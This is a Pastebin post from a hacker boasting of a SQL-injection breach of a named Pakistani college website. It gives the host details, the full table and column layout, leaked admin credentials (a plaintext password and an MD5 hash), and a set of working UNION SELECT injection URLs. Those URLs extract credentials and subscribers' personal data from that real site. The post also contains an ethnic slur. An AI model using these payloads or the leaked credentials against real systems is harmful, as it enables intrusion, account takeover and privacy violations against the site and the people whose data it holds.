API tools faq
paste
Advertisement
Def4z3r

actmacollege.edu.pk DATABASE DUMPED !

Def4z3r
Jul 1st, 2011
402
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 7.40 KB | None | 0 0
raw download clone embed print report
  1. ____ __ _ _ _____
  2. | _ \ ___ / _| | || | ____ |___ / _ __
  3. | | | | / _ \ | |_ | || |_ |_ / |_ \ | '__|
  4. | |_| | | __/ | _| |__ _| / / ___) | | |
  5. |____/ \___| |_| |_| /___| |____/ |_|
  6. _---------------------------------------------------------------_
  7. ---------------------------------------------------------------
  8.  
  9. # Exploit Title:www.actmacollege.edu.pk DATABASE DUMPED !
  10. # Google Dork: Porkistan FUCKED !
  11. # Date: I WILL EXPLAIN LATER
  12. # Author: Def4z3r
  13. # Vulnerable Link 1 : http://www.actmacollege.edu.pk/cources.php?cms_id='3
  14. # Version: NEW GENERATION BOYZ 2012
  15. # Tested on: HACKERS TRACK
  16. # CVE : NO EXISTS
  17.  
  18. _ _ _ _ _ _
  19. / \ | |__ ___ _ _| |_ | | | | ___ ___| |_
  20. / _ \ | '_ \ / _ \| | | | __| | |_| |/ _ \/ __| __|
  21. / ___ \| |_) | (_) | |_| | |_ | _ | (_) \__ \ |_
  22. /_/ \_\_.__/ \___/ \__,_|\__| |_| |_|\___/|___/\__|
  23. -------------------------------------------------------------
  24.  
  25. # Trget : http://www.actmacollege.edu.pk
  26. # Host IP : 173.212.248.18
  27. # Web Server : Apache
  28. # Powered-by : PHP/5.2.17
  29. # Keyword Found : Master
  30. # Injection type : Integer
  31. # Version : MySQL v 5.0.92-community
  32. # User : actmacol_pak@localhost
  33. # Database : actmacol_pak
  34.  
  35.  
  36.  
  37. _____ _ _ _ _ ____ _
  38. |_ _|_ _| |__ | | ___ | \ | | __ _ _ __ ___ ___ / ___|___ | |_ _ _ __ ___ _ __ ___
  39. | |/ _` | '_ \| |/ _ \ | \| |/ _` | '_ ` _ \ / _ \ | | / _ \| | | | | '_ ` _ \| '_ \/ __|
  40. | | (_| | |_) | | __/ | |\ | (_| | | | | | | __/ | |___ (_) | | |_| | | | | | | | | \__ \
  41. |_|\__,_|_.__/|_|\___| |_| \_|\__,_|_| |_| |_|\___| \____\___/|_|\__,_|_| |_| |_|_| |_|___/
  42. -----------------------------------------------------------------------------------------------------
  43.  
  44. # Vulnerable Selected Column Count is 17
  45. # Vulnerable Valid String Column is 4
  46. # Target Vulnerable :Yes
  47.  
  48. table name : actmacol_pak
  49.  
  50. # Table Name :Columns
  51. ----------------------------
  52. # tbl_user :user_created user_updated user_login_count user_last_login user_active user_type user_pword user_email user_lname user_fname user_id
  53. # tbl_subscribe :email_verified email_unique_key email_subscribe email_email email_postcode_city email_street email_phone email_lname email_fname email_id
  54. # tbl_siteconfig :config_display_order config_active config_desc config_value config_name config_key config_id
  55. # tbl_photo :photo_album_cover media_type photo_display_order photo_updated photo_added photo_status photo_description photo_name photo_album_id photo_id
  56. # tbl_notice :news_deleted news_archive news_admin_id news_active news_display_order news_updated news_added news_date news_image news_content news_title news_id
  57. # tbl_newsletter :newsletter_attachedFile newsletter_added newsletter_sent_date newsletter_sent newsletter_content newsletter_title newsletter_id
  58. # tbl_news :news_deleted news_archive news_admin_id news_active news_display_order news_updated news_added news_date news_image news_content news_title news_id
  59. # tbl_jaarverslag :content_order content_updated content_added content_date content_archive content_active content_content content_title content_id
  60. # tbl_cms :cms_banner_id cms_type cms_subpage_allow cms_delete_allow cms_deleted cms_updated cms_added cms_active cms_display_order cms_content cms_slug
  61. cms_meta_description cms_meta_keyword cms_page_title cms_page_name cms_parent_id cms_id
  62.  
  63. # tbl_banner :banner_added banner_default banner_filename banner_type banner_name banner_id
  64. # tbl_album :event_occurrence description album_deleted album_updated album_added album_active album_description album_name album_id
  65. # faq :curr_date faq_active date faq_deleted setorder answer question faq_id
  66. # diplomas :student_session program student_status student_registration diploma_images3 diploma_images2 diploma_images student_name diploma_id
  67. # blite5_users :usr_status usr_join_date usr_mail usr_pass usr_name usr_id
  68. # blite5_settings :set_fast set_value set_id
  69. # blite5_online :rtime usr_ip usr_name usr_id
  70. # blite5_lines :line_txt timestamp from_name from_id line_id
  71.  
  72.  
  73.  
  74. _ _ _ _ _ _
  75. / \ __| |_ __ ___ (_)_ __ (_)___| |_ _ __ __ _| |_ ___ _ __
  76. / _ \ / _` | '_ ` _ \| | '_ \| / __| __| '__/ _` | __/ _ \| '__|
  77. / ___ \ (_| | | | | | | | | | | \__ \ |_| | | (_| | |_ (_) | |
  78. /_/ \_\__,_|_| |_| |_|_|_| |_|_|___/\__|_| \__,_|\__\___/|_|
  79. ------------------------------------------------------------------------
  80.  
  81. FROM tbl_user
  82. ----------------------
  83. User name1: user_lname=Khan
  84. User name2: user_fname=Shakeel
  85. User id : 1
  86. User Email: [email protected]
  87. Password : admin
  88.  
  89.  
  90. FROM blite5_users
  91. ----------------------
  92. User name : mobina
  93. User id : 1
  94. Password : 4a6a9caf4af24093acbc98ab1748f1aa
  95.  
  96.  
  97.  
  98. ____ _
  99. | _ \ __ _| |_ __ _ ____
  100. | | | |/ _` | __/ _` |_ /
  101. | |_| | (_| | |_ (_| |/ /
  102. |____/ \__,_|\__\__,_/___|
  103. ------------------------------------------
  104.  
  105. # http://www.actmacollege.edu.pk/cources.php?cms_id=-3 union all select 1,2,3,schema_name,5,6,7,8,9,10,11,12,13,14,15,16,17 from information_schema.schemata--
  106.  
  107. # http://www.actmacollege.edu.pk/cources.php?cms_id=-3 union all select 1,2,3,user(),5,6,7,8,9,10,11,12,13,14,15,16,17--
  108.  
  109. # http://www.actmacollege.edu.pk/cources.php?cms_id=-3 union all select 1,2,3,database(),5,6,7,8,9,10,11,12,13,14,15,16,17--
  110.  
  111. # http://www.actmacollege.edu.pk/cources.php?cms_id=-3 union all select 1,2,3,version(),5,6,7,8,9,10,11,12,13,14,15,16,17--
  112.  
  113. # http://www.actmacollege.edu.pk/cources.php?cms_id=-3 union all select 1,2,3,concat(version(),0x3a,user(),0x3a,database()),5,6,7,8,9,10,11,12,13,14,15,16,17--
  114.  
  115. # http://www.actmacollege.edu.pk/cources.php?cms_id=-3 union all select 1,2,3,concat(user_pword,0x3a,user_email),5,6,7,8,9,10,11,12,13,14,15,16,17 FROM tbl_user --
  116.  
  117. # http://www.actmacollege.edu.pk/cources.php?cms_id=-3 union all select 1,2,3,concat(usr_name,0x3a,usr_pass),5,6,7,8,9,10,11,12,13,14,15,16,17 FROM blite5_users --
  118.  
  119. # http://www.actmacollege.edu.pk/cources.php?cms_id=-3 union all select 1,2,3,group_concat(column_name),5,6,7,8,9,10,11,12,13,14,15,16,17 from information_schema.columns where table_schema=database()--
  120.  
  121. # http://www.actmacollege.edu.pk/cources.php?cms_id=-3 union all select 1,2,3,concat(0x3c703e,email_verified,0x3c62723e,email_unique_key,0x3c62723e,email_subscribe,0x3c62723e,email_email,0x3c62723e,email_postcode_city,0x3c62723e,email_street,0x3c62723e,email_phone email_lname,0x3c62723e,email_fname,0x3c62723e,email_id ),5,6,7,8,9,10,11,12,13,14,15,16,17 FROM tbl_subscribe--
  122.  
  123. ___ ____ _ _
  124. / _ \ / ___| ___ ___ _ _ _ __(_) |_ _ _
  125. | | | | \___ \ / _ \/ __| | | | '__| | __| | | |
  126. | |_| | ___) | __/ (__| |_| | | | | |_| |_| |
  127. \___/ |____/ \___|\___|\__,_|_| |_|\__|\__, |
  128. |___/
  129. ------------------------------------------------------
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!